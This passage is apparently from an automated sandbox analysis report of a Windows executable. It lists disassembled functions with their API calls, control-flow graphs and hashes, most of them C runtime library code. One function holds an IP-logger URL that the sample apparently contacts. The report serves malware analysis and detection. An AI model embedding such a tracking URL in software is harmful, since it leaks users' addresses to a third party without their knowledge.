                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3276244213-0
                                                                                                                                                                                                                                                              • Opcode ID: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                                                                                                                                                                                                                              • Instruction ID: 96d11910a95bedc14b4fedca9dba3d50b6b44b5974bd70865ba5ba31b18bed2c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23A0243054030035D51013007C03F0C73401740F00FF0403477453C0D151751134440F
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 004027AB Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040399E
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004039B3
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0040E2A0), ref: 004039BE
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004039DA
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004039E1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              • Opcode ID: 0303aa8dc74aa5ad8f1eca1bcb844625175bfd7a242af0c9f0467950de8e5cb8
                                                                                                                                                                                                                                                              • Instruction ID: f6f57e71003203d288891d34c15bbe42bcfdf8c7449e4b89e8457585370d882e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0303aa8dc74aa5ad8f1eca1bcb844625175bfd7a242af0c9f0467950de8e5cb8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE21CCB8A01304DFD740DF69FE896047BA4BB0A304F5005BAE909A32A4E7F49981DF0D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040836D Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __decode_pointer.LIBCMT ref: 0040837B
                                                                                                                                                                                                                                                                • Part of subcall function 004065B2: TlsGetValue.KERNEL32(?,00404407,00402CE7,?,00000000,004018C3,?), ref: 004065BF
                                                                                                                                                                                                                                                                • Part of subcall function 004065B2: TlsGetValue.KERNEL32(00000005,?,00404407,00402CE7,?,00000000,004018C3,?), ref: 004065D6
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00408382
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1958600898-0
                                                                                                                                                                                                                                                              • Opcode ID: 64c346057faed5819ef11c8f1e36578fb30f52b61f2f0afe06d7bbcda1bb290d
                                                                                                                                                                                                                                                              • Instruction ID: 52dae8596827c5713c80bac6c30eebab967ee815650ab94fa9040cb2a4162669
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c346057faed5819ef11c8f1e36578fb30f52b61f2f0afe06d7bbcda1bb290d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C04C55C1C2819EF71177796C8D319BA14AB12214F6489BFE841A5792D6FC4194823B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402D90 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                              • Instruction ID: cfe817a34c3c5f2941da33a15fcb8d8e5553d8807e070374dd4ca8ac995e889c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD11267724004243DA45862DCEBC6B7E396FFC532172C437BC0426B7C8C1BAAC45A608
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004068F5 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 210 4068f5-406905 GetModuleHandleA 211 406910-406958 GetProcAddress * 4 210->211 212 406907-40690f call 406648 210->212 214 406970-40698f 211->214 215 40695a-406961 211->215 217 406994-4069a2 TlsAlloc 214->217 215->214 216 406963-40696a 215->216 216->214 219 40696c-40696e 216->219 220 406a74 217->220 221 4069a8-4069b3 TlsSetValue 217->221 219->214 219->217 222 406a76-406a78 220->222 221->220 223 4069b9-406a08 call 406242 call 406546 * 4 call 4050ee 221->223 236 406a0a-406a25 call 4065b2 223->236 237 406a6f call 406648 223->237 236->237 242 406a27-406a39 call 4093a0 236->242 237->220 242->237 245 406a3b-406a52 call 4065b2 242->245 245->237 249 406a54-406a6d call 406685 GetCurrentThreadId 245->249 249->222
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004032D1), ref: 004068FB
                                                                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 00406907
                                                                                                                                                                                                                                                                • Part of subcall function 00406648: __decode_pointer.LIBCMT ref: 00406659
                                                                                                                                                                                                                                                                • Part of subcall function 00406648: TlsFree.KERNEL32(0000000E,00406A74), ref: 00406673
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040691D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040692A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00406937
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00406944
                                                                                                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 00406994
                                                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 004069AF
                                                                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 004069B9
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069C4
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069D4
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069E4
                                                                                                                                                                                                                                                              • __encode_pointer.LIBCMT ref: 004069F4
                                                                                                                                                                                                                                                              • __decode_pointer.LIBCMT ref: 00406A15
                                                                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00406A2E
                                                                                                                                                                                                                                                              • __decode_pointer.LIBCMT ref: 00406A48
                                                                                                                                                                                                                                                              • __initptd.LIBCMT ref: 00406A57
                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406A5E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                              • API String ID: 2657569430-3819984048
                                                                                                                                                                                                                                                              • Opcode ID: dd9c942f510c8cbf7b741161731a130b64e08462a1f4c216e580e18ae0143119
                                                                                                                                                                                                                                                              • Instruction ID: 3e6afccfaca81f5d0103fedc316d18b579f0ddb50245cd779906375d6cdb54ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd9c942f510c8cbf7b741161731a130b64e08462a1f4c216e580e18ae0143119
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0031A3F4E02610EADB20AF76BD05A167AA5EB46754B11493FF812F22F0DB798460CF5C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401FF0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 191COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 252 401ff0-40202e 253 402032-40203c call 402d00 252->253 255 402058-40206c call 402d00 253->255 256 40203e-402052 call 402d00 253->256 262 402085-402090 255->262 263 40206e-402083 255->263 256->255 261 4021fd-402210 call 4027ab 256->261 264 402096-4020a6 call 402d00 262->264 263->264 269 4020b1-4020b3 264->269 270 4020a8-4020af 264->270 271 4020b6-4020bd 269->271 272 4020c4-4020f6 call 402c34 call 403de0 call 403e60 call 402d00 270->272 271->271 273 4020bf-4020c1 271->273 282 402137-40214a call 402c34 272->282 283 4020f8-4020fd 272->283 273->272 288 40214f-402162 call 402d00 282->288 285 402100-402107 283->285 285->285 287 402109-402124 call 402c34 call 403de0 285->287 297 402127-402133 287->297 295 402164-40216e 288->295 296 4021a6-4021ac 288->296 299 402171-402178 295->299 298 4021b0-4021b7 296->298 297->297 300 402135 297->300 298->298 301 4021b9-4021bb 298->301 299->299 302 40217a-4021a4 call 403e60 call 4030f9 299->302 300->288 303 4021be-4021fc call 402c34 call 403de0 call 403e60 call 4027ab 301->303 302->303
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _malloc$_memset$_sscanf
                                                                                                                                                                                                                                                              • String ID: http://$https://$https://grabify.org/1wxS
                                                                                                                                                                                                                                                              • API String ID: 3562546547-2243597105
                                                                                                                                                                                                                                                              • Opcode ID: 7ca267f47b0bbe4fd8b7c8ec0aca4eb17133205b1f5f5d7ae0b0adeddff11272
                                                                                                                                                                                                                                                              • Instruction ID: 04648c2704c8df8df0a262ed70051c55dacd21bfe2762a4372ee7066968d4f18
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ca267f47b0bbe4fd8b7c8ec0aca4eb17133205b1f5f5d7ae0b0adeddff11272
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC517B725043016BD710DF298D0AB5B7BE5AF85308F18452EF948BB3C1D6BDD904C79A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402B57 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00402B75
                                                                                                                                                                                                                                                                • Part of subcall function 00405264: __mtinitlocknum.LIBCMT ref: 00405278
                                                                                                                                                                                                                                                                • Part of subcall function 00405264: __amsg_exit.LIBCMT ref: 00405284
                                                                                                                                                                                                                                                                • Part of subcall function 00405264: EnterCriticalSection.KERNEL32(?,?,?,0040BD2E,00000004,0044AD90,0000000C,004093B3,?,?,00000000,00000000,00000000,0040676E,00000001,00000214), ref: 0040528C
                                                                                                                                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 00402B80
                                                                                                                                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 00402B8F
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0044A918,0000000C,00405245,00000000,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00402BBF
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00403D95,00402CED,00000000,004018C3,?), ref: 00402BD0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                                                                                                                                              • Opcode ID: d3f1ce3d0c091cffb581d3c8956bed276382fe299b658f6b4fdd416956a9a656
                                                                                                                                                                                                                                                              • Instruction ID: 4460b38731b88224fb186ba4f1206185b519f30374d862fce58076fd2da0bb21
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3f1ce3d0c091cffb581d3c8956bed276382fe299b658f6b4fdd416956a9a656
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56018F31804715AAEF206F72AD0EB5B3B74AF00765F20447FF405761C1DABCA9809EAC
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402754 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0040275B
                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040278D
                                                                                                                                                                                                                                                                • Part of subcall function 0040346B: RaiseException.KERNEL32(?,?,00402ADB,?,?,?,?,?,00402ADB,?,0044AEB0,0044D160), ref: 004034AB
                                                                                                                                                                                                                                                                • Part of subcall function 00401BC0: std::exception::exception.LIBCMT ref: 00401BEE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                                                                                                              • String ID: (@$invalid string position
                                                                                                                                                                                                                                                              • API String ID: 2977319401-1301154146
                                                                                                                                                                                                                                                              • Opcode ID: df56834322b885f407402cb1609de731c652524eb200d84411b32e2617127052
                                                                                                                                                                                                                                                              • Instruction ID: c130225eb8f595a09aa5eaee85491a4b889f3b67d2352e031182bf042fa89ac7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df56834322b885f407402cb1609de731c652524eb200d84411b32e2617127052
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6E03071910118AAD704FBD6D801ECEBBBCAF04355F10497FB200B61D2DBB89554CB6D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040B7E6 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B816
                                                                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 0040B84A
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00409883,?,?,00000002), ref: 0040B87B
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00409883,?,?,00000002), ref: 0040B8E9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                                                                              • Opcode ID: f42b53b8aa7ddd51646c6e389545eef6affaf647b84a38677d11fe2463d46b0c
                                                                                                                                                                                                                                                              • Instruction ID: 04c4206088e162f240fb64e728f365c33255b7101941b0580c2359484fceb174
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f42b53b8aa7ddd51646c6e389545eef6affaf647b84a38677d11fe2463d46b0c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931B332A10255EFDB20EFA4C8449AE3BA8FF01351F14C57AE451AB2E1D334D941DB9D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040D96C Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,0040DA99,?,0044AE50,00000010,0040CE3A,00000000,00000040,00000040,00000040,00000000,?,00000000,0040CEBF), ref: 0040D9B7
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040D9C1
                                                                                                                                                                                                                                                              • __free_osfhnd.LIBCMT ref: 0040D9CE
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0040D9F0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr__free_osfhnd
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1721093958-0
                                                                                                                                                                                                                                                              • Opcode ID: 991183d5e15b9201343fa96ce4b89d1dd74fcf33bf86d4857bfd7c5aa9760cd5
                                                                                                                                                                                                                                                              • Instruction ID: af4e8bc5e9103d40532bb548bc30caa7a80e7e8e27848e4e735ceeddbfc665a6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 991183d5e15b9201343fa96ce4b89d1dd74fcf33bf86d4857bfd7c5aa9760cd5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D501D6B3D15220D5D72427BAA98675B66844F82738F16063BF820B72D2CEBCC889D16D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401C40 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004024CC,004024CA,00000000,00000000,00000000,00000000,00000000,6F752AA0,00000000,6F73F270,?,004024CC,00000000), ref: 00401C75
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00401C80
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401C8B
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004024CA,00000000,?,00000000,00000000,?,?,004024CC,00000000,?,?,?,00000004), ref: 00401CA7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
